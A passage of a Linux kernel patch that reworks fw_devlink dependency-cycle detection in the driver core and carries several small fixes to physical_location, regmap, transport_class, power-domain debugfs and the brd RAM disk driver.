++ * __fwnode_link_cycle - Mark a fwnode link as being part of a cycle.
++ * @link: the fwnode_link to be marked
++ *
++ * The fwnode_link_lock needs to be held when this function is called.
++ */
++static void __fwnode_link_cycle(struct fwnode_link *link)
++{
++	pr_debug("%pfwf: Relaxing link with %pfwf\n",
++		 link->consumer, link->supplier);
++	link->flags |= FWLINK_FLAG_CYCLE;
++}
++
+ /**
+  * fwnode_links_purge_suppliers - Delete all supplier links of fwnode_handle.
+  * @fwnode: fwnode whose supplier links need to be deleted
+@@ -181,6 +202,51 @@ void fw_devlink_purge_absent_suppliers(struct fwnode_handle *fwnode)
+ }
+ EXPORT_SYMBOL_GPL(fw_devlink_purge_absent_suppliers);
+ 
++/**
++ * __fwnode_links_move_consumers - Move consumer from @from to @to fwnode_handle
++ * @from: move consumers away from this fwnode
++ * @to: move consumers to this fwnode
++ *
++ * Move all consumer links from @from fwnode to @to fwnode.
++ */
++static void __fwnode_links_move_consumers(struct fwnode_handle *from,
++					  struct fwnode_handle *to)
++{
++	struct fwnode_link *link, *tmp;
++
++	list_for_each_entry_safe(link, tmp, &from->consumers, s_hook) {
++		__fwnode_link_add(link->consumer, to, link->flags);
++		__fwnode_link_del(link);
++	}
++}
++
++/**
++ * __fw_devlink_pickup_dangling_consumers - Pick up dangling consumers
++ * @fwnode: fwnode from which to pick up dangling consumers
++ * @new_sup: fwnode of new supplier
++ *
++ * If the @fwnode has a corresponding struct device and the device supports
++ * probing (that is, added to a bus), then we want to let fw_devlink create
++ * MANAGED device links to this device, so leave @fwnode and its descendant's
++ * fwnode links alone.
++ *
++ * Otherwise, move its consumers to the new supplier @new_sup.
++ */
++static void __fw_devlink_pickup_dangling_consumers(struct fwnode_handle *fwnode,
++						   struct fwnode_handle *new_sup)
++{
++	struct fwnode_handle *child;
++
++	if (fwnode->dev && fwnode->dev->bus)
++		return;
++
++	fwnode->flags |= FWNODE_FLAG_NOT_DEVICE;
++	__fwnode_links_move_consumers(fwnode, new_sup);
++
++	fwnode_for_each_available_child_node(fwnode, child)
++		__fw_devlink_pickup_dangling_consumers(child, new_sup);
++}
++
+ #ifdef CONFIG_SRCU
+ static DEFINE_MUTEX(device_links_lock);
+ DEFINE_STATIC_SRCU(device_links_srcu);
+@@ -272,6 +338,12 @@ static bool device_is_ancestor(struct device *dev, struct device *target)
+ 	return false;
+ }
+ 
++static inline bool device_link_flag_is_sync_state_only(u32 flags)
++{
++	return (flags & ~(DL_FLAG_INFERRED | DL_FLAG_CYCLE)) ==
++		(DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED);
++}
++
+ /**
+  * device_is_dependent - Check if one device depends on another one
+  * @dev: Device to check dependencies for.
+@@ -298,8 +370,7 @@ int device_is_dependent(struct device *dev, void *target)
+ 		return ret;
+ 
+ 	list_for_each_entry(link, &dev->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
++		if (device_link_flag_is_sync_state_only(link->flags))
+ 			continue;
+ 
+ 		if (link->consumer == target)
+@@ -372,8 +443,7 @@ static int device_reorder_to_tail(struct device *dev, void *not_used)
+ 
+ 	device_for_each_child(dev, NULL, device_reorder_to_tail);
+ 	list_for_each_entry(link, &dev->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
++		if (device_link_flag_is_sync_state_only(link->flags))
+ 			continue;
+ 		device_reorder_to_tail(link->consumer, NULL);
+ 	}
+@@ -634,7 +704,8 @@ postcore_initcall(devlink_class_init);
+ 			       DL_FLAG_AUTOREMOVE_SUPPLIER | \
+ 			       DL_FLAG_AUTOPROBE_CONSUMER  | \
+ 			       DL_FLAG_SYNC_STATE_ONLY | \
+-			       DL_FLAG_INFERRED)
++			       DL_FLAG_INFERRED | \
++			       DL_FLAG_CYCLE)
+ 
+ #define DL_ADD_VALID_FLAGS (DL_MANAGED_LINK_FLAGS | DL_FLAG_STATELESS | \
+ 			    DL_FLAG_PM_RUNTIME | DL_FLAG_RPM_ACTIVE)
+@@ -703,8 +774,6 @@ struct device_link *device_link_add(struct device *consumer,
+ 	if (!consumer || !supplier || consumer == supplier ||
+ 	    flags & ~DL_ADD_VALID_FLAGS ||
+ 	    (flags & DL_FLAG_STATELESS && flags & DL_MANAGED_LINK_FLAGS) ||
+-	    (flags & DL_FLAG_SYNC_STATE_ONLY &&
+-	     (flags & ~DL_FLAG_INFERRED) != DL_FLAG_SYNC_STATE_ONLY) ||
+ 	    (flags & DL_FLAG_AUTOPROBE_CONSUMER &&
+ 	     flags & (DL_FLAG_AUTOREMOVE_CONSUMER |
+ 		      DL_FLAG_AUTOREMOVE_SUPPLIER)))
+@@ -720,6 +789,10 @@ struct device_link *device_link_add(struct device *consumer,
+ 	if (!(flags & DL_FLAG_STATELESS))
+ 		flags |= DL_FLAG_MANAGED;
+ 
++	if (flags & DL_FLAG_SYNC_STATE_ONLY &&
++	    !device_link_flag_is_sync_state_only(flags))
++		return NULL;
++
+ 	device_links_write_lock();
+ 	device_pm_lock();
+ 
+@@ -984,6 +1057,21 @@ static bool dev_is_best_effort(struct device *dev)
+ 		(dev->fwnode && (dev->fwnode->flags & FWNODE_FLAG_BEST_EFFORT));
+ }
+ 
++static struct fwnode_handle *fwnode_links_check_suppliers(
++						struct fwnode_handle *fwnode)
++{
++	struct fwnode_link *link;
++
++	if (!fwnode || fw_devlink_is_permissive())
++		return NULL;
++
++	list_for_each_entry(link, &fwnode->suppliers, c_hook)
++		if (!(link->flags & FWLINK_FLAG_CYCLE))
++			return link->supplier;
++
++	return NULL;
++}
++
+ /**
+  * device_links_check_suppliers - Check presence of supplier drivers.
+  * @dev: Consumer device.
+@@ -1011,11 +1099,8 @@ int device_links_check_suppliers(struct device *dev)
+ 	 * probe.
+ 	 */
+ 	mutex_lock(&fwnode_link_lock);
+-	if (dev->fwnode && !list_empty(&dev->fwnode->suppliers) &&
+-	    !fw_devlink_is_permissive()) {
+-		sup_fw = list_first_entry(&dev->fwnode->suppliers,
+-					  struct fwnode_link,
+-					  c_hook)->supplier;
++	sup_fw = fwnode_links_check_suppliers(dev->fwnode);
++	if (sup_fw) {
+ 		if (!dev_is_best_effort(dev)) {
+ 			fwnode_ret = -EPROBE_DEFER;
+ 			dev_err_probe(dev, -EPROBE_DEFER,
+@@ -1204,7 +1289,9 @@ static ssize_t waiting_for_supplier_show(struct device *dev,
+ 	bool val;
+ 
+ 	device_lock(dev);
+-	val = !list_empty(&dev->fwnode->suppliers);
++	mutex_lock(&fwnode_link_lock);
++	val = !!fwnode_links_check_suppliers(dev->fwnode);
++	mutex_unlock(&fwnode_link_lock);
+ 	device_unlock(dev);
+ 	return sysfs_emit(buf, "%u\n", val);
+ }
+@@ -1267,16 +1354,23 @@ void device_links_driver_bound(struct device *dev)
+ 	 * them. So, fw_devlink no longer needs to create device links to any
+ 	 * of the device's suppliers.
+ 	 *
+-	 * Also, if a child firmware node of this bound device is not added as
+-	 * a device by now, assume it is never going to be added and make sure
+-	 * other devices don't defer probe indefinitely by waiting for such a
+-	 * child device.
++	 * Also, if a child firmware node of this bound device is not added as a
++	 * device by now, assume it is never going to be added. Make this bound
++	 * device the fallback supplier to the dangling consumers of the child
++	 * firmware node because this bound device is probably implementing the
++	 * child firmware node functionality and we don't want the dangling
++	 * consumers to defer probe indefinitely waiting for a device for the
++	 * child firmware node.
+ 	 */
+ 	if (dev->fwnode && dev->fwnode->dev == dev) {
+ 		struct fwnode_handle *child;
+ 		fwnode_links_purge_suppliers(dev->fwnode);
++		mutex_lock(&fwnode_link_lock);
+ 		fwnode_for_each_available_child_node(dev->fwnode, child)
+-			fw_devlink_purge_absent_suppliers(child);
++			__fw_devlink_pickup_dangling_consumers(child,
++							       dev->fwnode);
++		__fw_devlink_link_to_consumers(dev);
++		mutex_unlock(&fwnode_link_lock);
+ 	}
+ 	device_remove_file(dev, &dev_attr_waiting_for_supplier);
+ 
+@@ -1633,8 +1727,11 @@ static int __init fw_devlink_strict_setup(char *arg)
+ }
+ early_param("fw_devlink.strict", fw_devlink_strict_setup);
+ 
+-u32 fw_devlink_get_flags(void)
++static inline u32 fw_devlink_get_flags(u8 fwlink_flags)
+ {
++	if (fwlink_flags & FWLINK_FLAG_CYCLE)
++		return FW_DEVLINK_FLAGS_PERMISSIVE | DL_FLAG_CYCLE;
++
+ 	return fw_devlink_flags;
+ }
+ 
+@@ -1672,7 +1769,7 @@ static void fw_devlink_relax_link(struct device_link *link)
+ 	if (!(link->flags & DL_FLAG_INFERRED))
+ 		return;
+ 
+-	if (link->flags == (DL_FLAG_MANAGED | FW_DEVLINK_FLAGS_PERMISSIVE))
++	if (device_link_flag_is_sync_state_only(link->flags))
+ 		return;
+ 
+ 	pm_runtime_drop_link(link);
+@@ -1769,44 +1866,138 @@ static void fw_devlink_unblock_consumers(struct device *dev)
+ 	device_links_write_unlock();
+ }
+ 
++
++static bool fwnode_init_without_drv(struct fwnode_handle *fwnode)
++{
++	struct device *dev;
++	bool ret;
++
++	if (!(fwnode->flags & FWNODE_FLAG_INITIALIZED))
++		return false;
++
++	dev = get_dev_from_fwnode(fwnode);
++	ret = !dev || dev->links.status == DL_DEV_NO_DRIVER;
++	put_device(dev);
++
++	return ret;
++}
++
++static bool fwnode_ancestor_init_without_drv(struct fwnode_handle *fwnode)
++{
++	struct fwnode_handle *parent;
++
++	fwnode_for_each_parent_node(fwnode, parent) {
++		if (fwnode_init_without_drv(parent)) {
++			fwnode_handle_put(parent);
++			return true;
++		}
++	}
++
++	return false;
++}
++
+ /**
+- * fw_devlink_relax_cycle - Convert cyclic links to SYNC_STATE_ONLY links
+- * @con: Device to check dependencies for.
+- * @sup: Device to check against.
+- *
+- * Check if @sup depends on @con or any device dependent on it (its child or
+- * its consumer etc).  When such a cyclic dependency is found, convert all
+- * device links created solely by fw_devlink into SYNC_STATE_ONLY device links.
+- * This is the equivalent of doing fw_devlink=permissive just between the
+- * devices in the cycle. We need to do this because, at this point, fw_devlink
+- * can't tell which of these dependencies is not a real dependency.
+- *
+- * Return 1 if a cycle is found. Otherwise, return 0.
++ * __fw_devlink_relax_cycles - Relax and mark dependency cycles.
++ * @con: Potential consumer device.
++ * @sup_handle: Potential supplier's fwnode.
++ *
++ * Needs to be called with fwnode_lock and device link lock held.
++ *
++ * Check if @sup_handle or any of its ancestors or suppliers direct/indirectly
++ * depend on @con. This function can detect multiple cyles between @sup_handle
++ * and @con. When such dependency cycles are found, convert all device links
++ * created solely by fw_devlink into SYNC_STATE_ONLY device links. Also, mark
++ * all fwnode links in the cycle with FWLINK_FLAG_CYCLE so that when they are
++ * converted into a device link in the future, they are created as
++ * SYNC_STATE_ONLY device links. This is the equivalent of doing
++ * fw_devlink=permissive just between the devices in the cycle. We need to do
++ * this because, at this point, fw_devlink can't tell which of these
++ * dependencies is not a real dependency.
++ *
++ * Return true if one or more cycles were found. Otherwise, return false.
+  */
+-static int fw_devlink_relax_cycle(struct device *con, void *sup)
++static bool __fw_devlink_relax_cycles(struct device *con,
++				 struct fwnode_handle *sup_handle)
+ {
+-	struct device_link *link;
+-	int ret;
++	struct device *sup_dev = NULL, *par_dev = NULL;
++	struct fwnode_link *link;
++	struct device_link *dev_link;
++	bool ret = false;
+ 
+-	if (con == sup)
+-		return 1;
++	if (!sup_handle)
++		return false;
+ 
+-	ret = device_for_each_child(con, sup, fw_devlink_relax_cycle);
+-	if (ret)
+-		return ret;
++	/*
++	 * We aren't trying to find all cycles. Just a cycle between con and
++	 * sup_handle.
++	 */
++	if (sup_handle->flags & FWNODE_FLAG_VISITED)
++		return false;
+ 
+-	list_for_each_entry(link, &con->links.consumers, s_node) {
+-		if ((link->flags & ~DL_FLAG_INFERRED) ==
+-		    (DL_FLAG_SYNC_STATE_ONLY | DL_FLAG_MANAGED))
+-			continue;
++	sup_handle->flags |= FWNODE_FLAG_VISITED;
+ 
+-		if (!fw_devlink_relax_cycle(link->consumer, sup))
+-			continue;
++	sup_dev = get_dev_from_fwnode(sup_handle);
+ 
+-		ret = 1;
++	/* Termination condition. */
++	if (sup_dev == con) {
++		ret = true;
++		goto out;
++	}
+ 
+-		fw_devlink_relax_link(link);
++	/*
++	 * If sup_dev is bound to a driver and @con hasn't started binding to a
++	 * driver, sup_dev can't be a consumer of @con. So, no need to check
++	 * further.
++	 */
++	if (sup_dev && sup_dev->links.status ==  DL_DEV_DRIVER_BOUND &&
++	    con->links.status == DL_DEV_NO_DRIVER) {
++		ret = false;
++		goto out;
++	}
++
++	list_for_each_entry(link, &sup_handle->suppliers, c_hook) {
++		if (__fw_devlink_relax_cycles(con, link->supplier)) {
++			__fwnode_link_cycle(link);
++			ret = true;
++		}
++	}
++
++	/*
++	 * Give priority to device parent over fwnode parent to account for any
++	 * quirks in how fwnodes are converted to devices.
++	 */
++	if (sup_dev)
++		par_dev = get_device(sup_dev->parent);
++	else
++		par_dev = fwnode_get_next_parent_dev(sup_handle);
++
++	if (par_dev && __fw_devlink_relax_cycles(con, par_dev->fwnode))
++		ret = true;
++
++	if (!sup_dev)
++		goto out;
++
++	list_for_each_entry(dev_link, &sup_dev->links.suppliers, c_node) {
++		/*
++		 * Ignore a SYNC_STATE_ONLY flag only if it wasn't marked as
++		 * such due to a cycle.
++		 */
++		if (device_link_flag_is_sync_state_only(dev_link->flags) &&
++		    !(dev_link->flags & DL_FLAG_CYCLE))
++			continue;
++
++		if (__fw_devlink_relax_cycles(con,
++					      dev_link->supplier->fwnode)) {
++			fw_devlink_relax_link(dev_link);
++			dev_link->flags |= DL_FLAG_CYCLE;
++			ret = true;
++		}
+ 	}
++
++out:
++	sup_handle->flags &= ~FWNODE_FLAG_VISITED;
++	put_device(sup_dev);
++	put_device(par_dev);
+ 	return ret;
+ }
+ 
+@@ -1814,7 +2005,7 @@ static int fw_devlink_relax_cycle(struct device *con, void *sup)
+  * fw_devlink_create_devlink - Create a device link from a consumer to fwnode
+  * @con: consumer device for the device link
+  * @sup_handle: fwnode handle of supplier
+- * @flags: devlink flags
++ * @link: fwnode link that's being converted to a device link
+  *
+  * This function will try to create a device link between the consumer device
+  * @con and the supplier device represented by @sup_handle.
+@@ -1831,10 +2022,17 @@ static int fw_devlink_relax_cycle(struct device *con, void *sup)
+  *  possible to do that in the future
+  */
+ static int fw_devlink_create_devlink(struct device *con,
+-				     struct fwnode_handle *sup_handle, u32 flags)
++				     struct fwnode_handle *sup_handle,
++				     struct fwnode_link *link)
+ {
+ 	struct device *sup_dev;
+ 	int ret = 0;
++	u32 flags;
++
++	if (con->fwnode == link->consumer)
++		flags = fw_devlink_get_flags(link->flags);
++	else
++		flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 
+ 	/*
+ 	 * In some cases, a device P might also be a supplier to its child node
+@@ -1855,7 +2053,26 @@ static int fw_devlink_create_devlink(struct device *con,
+ 	    fwnode_is_ancestor_of(sup_handle, con->fwnode))
+ 		return -EINVAL;
+ 
+-	sup_dev = get_dev_from_fwnode(sup_handle);
++	/*
++	 * SYNC_STATE_ONLY device links don't block probing and supports cycles.
++	 * So cycle detection isn't necessary and shouldn't be done.
++	 */
++	if (!(flags & DL_FLAG_SYNC_STATE_ONLY)) {
++		device_links_write_lock();
++		if (__fw_devlink_relax_cycles(con, sup_handle)) {
++			__fwnode_link_cycle(link);
++			flags = fw_devlink_get_flags(link->flags);
++			dev_info(con, "Fixed dependency cycle(s) with %pfwf\n",
++				 sup_handle);
++		}
++		device_links_write_unlock();
++	}
++
++	if (sup_handle->flags & FWNODE_FLAG_NOT_DEVICE)
++		sup_dev = fwnode_get_next_parent_dev(sup_handle);
++	else
++		sup_dev = get_dev_from_fwnode(sup_handle);
++
+ 	if (sup_dev) {
+ 		/*
+ 		 * If it's one of those drivers that don't actually bind to
+@@ -1864,71 +2081,34 @@ static int fw_devlink_create_devlink(struct device *con,
+ 		 */
+ 		if (sup_dev->links.status == DL_DEV_NO_DRIVER &&
+ 		    sup_handle->flags & FWNODE_FLAG_INITIALIZED) {
++			dev_dbg(con,
++				"Not linking %pfwf - dev might never probe\n",
++				sup_handle);
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 
+-		/*
+-		 * If this fails, it is due to cycles in device links.  Just
+-		 * give up on this link and treat it as invalid.
+-		 */
+-		if (!device_link_add(con, sup_dev, flags) &&
+-		    !(flags & DL_FLAG_SYNC_STATE_ONLY)) {
+-			dev_info(con, "Fixing up cyclic dependency with %s\n",
+-				 dev_name(sup_dev));
+-			device_links_write_lock();
+-			fw_devlink_relax_cycle(con, sup_dev);
+-			device_links_write_unlock();
+-			device_link_add(con, sup_dev,
+-					FW_DEVLINK_FLAGS_PERMISSIVE);
++		if (con != sup_dev && !device_link_add(con, sup_dev, flags)) {
++			dev_err(con, "Failed to create device link (0x%x) with %s\n",
++				flags, dev_name(sup_dev));
+ 			ret = -EINVAL;
+ 		}
+ 
+ 		goto out;
+ 	}
+ 
+-	/* Supplier that's already initialized without a struct device. */
+-	if (sup_handle->flags & FWNODE_FLAG_INITIALIZED)
+-		return -EINVAL;
+-
+ 	/*
+-	 * DL_FLAG_SYNC_STATE_ONLY doesn't block probing and supports
+-	 * cycles. So cycle detection isn't necessary and shouldn't be
+-	 * done.
++	 * Supplier or supplier's ancestor already initialized without a struct
++	 * device or being probed by a driver.
+ 	 */
+-	if (flags & DL_FLAG_SYNC_STATE_ONLY)
+-		return -EAGAIN;
+-
+-	/*
+-	 * If we can't find the supplier device from its fwnode, it might be
+-	 * due to a cyclic dependency between fwnodes. Some of these cycles can
+-	 * be broken by applying logic. Check for these types of cycles and
+-	 * break them so that devices in the cycle probe properly.
+-	 *
+-	 * If the supplier's parent is dependent on the consumer, then the
+-	 * consumer and supplier have a cyclic dependency. Since fw_devlink
+-	 * can't tell which of the inferred dependencies are incorrect, don't
+-	 * enforce probe ordering between any of the devices in this cyclic
+-	 * dependency. Do this by relaxing all the fw_devlink device links in
+-	 * this cycle and by treating the fwnode link between the consumer and
+-	 * the supplier as an invalid dependency.
+-	 */
+-	sup_dev = fwnode_get_next_parent_dev(sup_handle);
+-	if (sup_dev && device_is_dependent(con, sup_dev)) {
+-		dev_info(con, "Fixing up cyclic dependency with %pfwP (%s)\n",
+-			 sup_handle, dev_name(sup_dev));
+-		device_links_write_lock();
+-		fw_devlink_relax_cycle(con, sup_dev);
+-		device_links_write_unlock();
+-		ret = -EINVAL;
+-	} else {
+-		/*
+-		 * Can't check for cycles or no cycles. So let's try
+-		 * again later.
+-		 */
+-		ret = -EAGAIN;
++	if (fwnode_init_without_drv(sup_handle) ||
++	    fwnode_ancestor_init_without_drv(sup_handle)) {
++		dev_dbg(con, "Not linking %pfwf - might never become dev\n",
++			sup_handle);
++		return -EINVAL;
+ 	}
+ 
++	ret = -EAGAIN;
+ out:
+ 	put_device(sup_dev);
+ 	return ret;
+@@ -1956,7 +2136,6 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+ 	struct fwnode_link *link, *tmp;
+ 
+ 	list_for_each_entry_safe(link, tmp, &fwnode->consumers, s_hook) {
+-		u32 dl_flags = fw_devlink_get_flags();
+ 		struct device *con_dev;
+ 		bool own_link = true;
+ 		int ret;
+@@ -1986,14 +2165,13 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+ 				con_dev = NULL;
+ 			} else {
+ 				own_link = false;
+-				dl_flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 			}
+ 		}
+ 
+ 		if (!con_dev)
+ 			continue;
+ 
+-		ret = fw_devlink_create_devlink(con_dev, fwnode, dl_flags);
++		ret = fw_devlink_create_devlink(con_dev, fwnode, link);
+ 		put_device(con_dev);
+ 		if (!own_link || ret == -EAGAIN)
+ 			continue;
+@@ -2013,10 +2191,7 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+  *
+  * The function creates normal (non-SYNC_STATE_ONLY) device links between @dev
+  * and the real suppliers of @dev. Once these device links are created, the
+- * fwnode links are deleted. When such device links are successfully created,
+- * this function is called recursively on those supplier devices. This is
+- * needed to detect and break some invalid cycles in fwnode links.  See
+- * fw_devlink_create_devlink() for more details.
++ * fwnode links are deleted.
+  *
+  * In addition, it also looks at all the suppliers of the entire fwnode tree
+  * because some of the child devices of @dev that have not been added yet
+@@ -2034,44 +2209,16 @@ static void __fw_devlink_link_to_suppliers(struct device *dev,
+ 	bool own_link = (dev->fwnode == fwnode);
+ 	struct fwnode_link *link, *tmp;
+ 	struct fwnode_handle *child = NULL;
+-	u32 dl_flags;
+-
+-	if (own_link)
+-		dl_flags = fw_devlink_get_flags();
+-	else
+-		dl_flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 
+ 	list_for_each_entry_safe(link, tmp, &fwnode->suppliers, c_hook) {
+ 		int ret;
+-		struct device *sup_dev;
+ 		struct fwnode_handle *sup = link->supplier;
+ 
+-		ret = fw_devlink_create_devlink(dev, sup, dl_flags);
++		ret = fw_devlink_create_devlink(dev, sup, link);
+ 		if (!own_link || ret == -EAGAIN)
+ 			continue;
+ 
+ 		__fwnode_link_del(link);
+-
+-		/* If no device link was created, nothing more to do. */
+-		if (ret)
+-			continue;
+-
+-		/*
+-		 * If a device link was successfully created to a supplier, we
+-		 * now need to try and link the supplier to all its suppliers.
+-		 *
+-		 * This is needed to detect and delete false dependencies in
+-		 * fwnode links that haven't been converted to a device link
+-		 * yet. See comments in fw_devlink_create_devlink() for more
+-		 * details on the false dependency.
+-		 *
+-		 * Without deleting these false dependencies, some devices will
+-		 * never probe because they'll keep waiting for their false
+-		 * dependency fwnode links to be converted to device links.
+-		 */
+-		sup_dev = get_dev_from_fwnode(sup);
+-		__fw_devlink_link_to_suppliers(sup_dev, sup_dev->fwnode);
+-		put_device(sup_dev);
+ 	}
+ 
+ 	/*
+@@ -3413,7 +3560,7 @@ int device_add(struct device *dev)
+ 	/* we require the name to be set before, and pass NULL */
+ 	error = kobject_add(&dev->kobj, dev->kobj.parent, NULL);
+ 	if (error) {
+-		glue_dir = get_glue_dir(dev);
++		glue_dir = kobj;
+ 		goto Error;
+ 	}
+ 
+@@ -3513,6 +3660,7 @@ done:
+ 	device_pm_remove(dev);
+ 	dpm_sysfs_remove(dev);
+  DPMError:
++	dev->driver = NULL;
+ 	bus_remove_device(dev);
+  BusError:
+ 	device_remove_attrs(dev);
+diff --git a/drivers/base/physical_location.c b/drivers/base/physical_location.c
+index 87af641cfe1a3..951819e71b4ad 100644
+--- a/drivers/base/physical_location.c
++++ b/drivers/base/physical_location.c
+@@ -24,8 +24,11 @@ bool dev_add_physical_location(struct device *dev)
+ 
+ 	dev->physical_location =
+ 		kzalloc(sizeof(*dev->physical_location), GFP_KERNEL);
+-	if (!dev->physical_location)
++	if (!dev->physical_location) {
++		ACPI_FREE(pld);
+ 		return false;
++	}
++
+ 	dev->physical_location->panel = pld->panel;
+ 	dev->physical_location->vertical_position = pld->vertical_position;
+ 	dev->physical_location->horizontal_position = pld->horizontal_position;
+diff --git a/drivers/base/platform-msi.c b/drivers/base/platform-msi.c
+index 5883e7634a2b7..f37ad34c80ec4 100644
+--- a/drivers/base/platform-msi.c
++++ b/drivers/base/platform-msi.c
+@@ -324,6 +324,7 @@ void platform_msi_device_domain_free(struct irq_domain *domain, unsigned int vir
+ 	struct platform_msi_priv_data *data = domain->host_data;
+ 
+ 	msi_lock_descs(data->dev);
++	msi_domain_depopulate_descs(data->dev, virq, nr_irqs);
+ 	irq_domain_free_irqs_common(domain, virq, nr_irqs);
+ 	msi_free_msi_descs_range(data->dev, virq, virq + nr_irqs - 1);
+ 	msi_unlock_descs(data->dev);
+diff --git a/drivers/base/power/domain.c b/drivers/base/power/domain.c
+index 967bcf9d415ea..6097644ebdc51 100644
+--- a/drivers/base/power/domain.c
++++ b/drivers/base/power/domain.c
+@@ -220,13 +220,10 @@ static void genpd_debug_add(struct generic_pm_domain *genpd);
+ 
+ static void genpd_debug_remove(struct generic_pm_domain *genpd)
+ {
+-	struct dentry *d;
+-
+ 	if (!genpd_debugfs_dir)
+ 		return;
+ 
+-	d = debugfs_lookup(genpd->name, genpd_debugfs_dir);
+-	debugfs_remove(d);
++	debugfs_lookup_and_remove(genpd->name, genpd_debugfs_dir);
+ }
+ 
+ static void genpd_update_accounting(struct generic_pm_domain *genpd)
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index d12d669157f24..d2a54eb0efd9b 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -1942,6 +1942,8 @@ static int _regmap_bus_reg_write(void *context, unsigned int reg,
+ {
+ 	struct regmap *map = context;
+ 
++	reg += map->reg_base;
++	reg >>= map->format.reg_downshift;
+ 	return map->bus->reg_write(map->bus_context, reg, val);
+ }
+ 
+@@ -2840,6 +2842,8 @@ static int _regmap_bus_reg_read(void *context, unsigned int reg,
+ {
+ 	struct regmap *map = context;
+ 
++	reg += map->reg_base;
++	reg >>= map->format.reg_downshift;
+ 	return map->bus->reg_read(map->bus_context, reg, val);
+ }
+ 
+@@ -3231,6 +3235,8 @@ static int _regmap_update_bits(struct regmap *map, unsigned int reg,
+ 		*change = false;
+ 
+ 	if (regmap_volatile(map, reg) && map->reg_update_bits) {
++		reg += map->reg_base;
++		reg >>= map->format.reg_downshift;
+ 		ret = map->reg_update_bits(map->bus_context, reg, mask, val);
+ 		if (ret == 0 && change)
+ 			*change = true;
+diff --git a/drivers/base/transport_class.c b/drivers/base/transport_class.c
+index ccc86206e5087..09ee2a1e35bbd 100644
+--- a/drivers/base/transport_class.c
++++ b/drivers/base/transport_class.c
+@@ -155,12 +155,27 @@ static int transport_add_class_device(struct attribute_container *cont,
+ 				      struct device *dev,
+ 				      struct device *classdev)
+ {
++	struct transport_class *tclass = class_to_transport_class(cont->class);
+ 	int error = attribute_container_add_class_device(classdev);
+ 	struct transport_container *tcont = 
+ 		attribute_container_to_transport_container(cont);
+ 
+-	if (!error && tcont->statistics)
++	if (error)
++		goto err_remove;
++
++	if (tcont->statistics) {
+ 		error = sysfs_create_group(&classdev->kobj, tcont->statistics);
++		if (error)
++			goto err_del;
++	}
++
++	return 0;
++
++err_del:
++	attribute_container_class_device_del(classdev);
++err_remove:
++	if (tclass->remove)
++		tclass->remove(tcont, dev, classdev);
+ 
+ 	return error;
+ }
+diff --git a/drivers/block/brd.c b/drivers/block/brd.c
+index 20acc4a1fd6de..a8a77a1efe1e3 100644
+--- a/drivers/block/brd.c
++++ b/drivers/block/brd.c
+@@ -78,32 +78,25 @@ static struct page *brd_lookup_page(struct brd_device *brd, sector_t sector)
+ }
+ 
+ /*
+- * Look up and return a brd's page for a given sector.
+- * If one does not exist, allocate an empty page, and insert that. Then
+- * return it.
++ * Insert a new page for a given sector, if one does not already exist.
+  */
+-static struct page *brd_insert_page(struct brd_device *brd, sector_t sector)
++static int brd_insert_page(struct brd_device *brd, sector_t sector, gfp_t gfp)
+ {
+ 	pgoff_t idx;
+ 	struct page *page;
+-	gfp_t gfp_flags;
++	int ret = 0;
+ 
+ 	page = brd_lookup_page(brd, sector);
+ 	if (page)
+-		return page;
++		return 0;
+ 
+-	/*
+-	 * Must use NOIO because we don't want to recurse back into the
+-	 * block or filesystem layers from page reclaim.
+-	 */
+-	gfp_flags = GFP_NOIO | __GFP_ZERO | __GFP_HIGHMEM;
+-	page = alloc_page(gfp_flags);
++	page = alloc_page(gfp | __GFP_ZERO | __GFP_HIGHMEM);
+ 	if (!page)
+-		return NULL;
++		return -ENOMEM;
+ 
+-	if (radix_tree_preload(GFP_NOIO)) {
++	if (radix_tree_maybe_preload(gfp)) {
+ 		__free_page(page);
+-		return NULL;
++		return -ENOMEM;
+ 	}
+ 
+ 	spin_lock(&brd->brd_lock);
+@@ -112,16 +105,17 @@ static struct page *brd_insert_page(struct brd_device *brd, sector_t sector)
+ 	if (radix_tree_insert(&brd->brd_pages, idx, page)) {
+ 		__free_page(page);
+ 		page = radix_tree_lookup(&brd->brd_pages, idx);
+-		BUG_ON(!page);
+-		BUG_ON(page->index != idx);
++		if (!page)
++			ret = -ENOMEM;
++		else if (page->index != idx)
++			ret = -EIO;
+ 	} else {
+ 		brd->brd_nr_pages++;
+ 	}
+ 	spin_unlock(&brd->brd_lock);
+ 
+ 	radix_tree_preload_end();
+-
+-	return page;
++	return ret;
+ }
+ 
+ /*
+@@ -170,20 +164,22 @@ static void brd_free_pages(struct brd_device *brd)
+ /*
+  * copy_to_brd_setup must be called before copy_to_brd. It may sleep.
+  */
+-static int copy_to_brd_setup(struct brd_device *brd, sector_t sector, size_t n)
++static int copy_to_brd_setup(struct brd_device *brd, sector_t sector, size_t n,
++			     gfp_t gfp)
+ {
+ 	unsigned int offset = (sector & (PAGE_SECTORS-1)) << SECTOR_SHIFT;
+ 	size_t copy;
++	int ret;
+ 
+ 	copy = min_t(size_t, n, PAGE_SIZE - offset);
+-	if (!brd_insert_page(brd, sector))
+-		return -ENOSPC;
++	ret = brd_insert_page(brd, sector, gfp);
++	if (ret)
++		return ret;
+ 	if (copy < n) {
+ 		sector += copy >> SECTOR_SHIFT;
+-		if (!brd_insert_page(brd, sector))
+-			return -ENOSPC;
++		ret = brd_insert_page(brd, sector, gfp);
+ 	}
+-	return 0;
++	return ret;
+ }
+ 
+ /*
+@@ -256,20 +252,26 @@ static void copy_from_brd(void *dst, struct brd_device *brd,
+  * Process a single bvec of a bio.
+  */
+ static int brd_do_bvec(struct brd_device *brd, struct page *page,
+-			unsigned int len, unsigned int off, enum req_op op,
++			unsigned int len, unsigned int off, blk_opf_t opf,
+ 			sector_t sector)
+ {
+ 	void *mem;
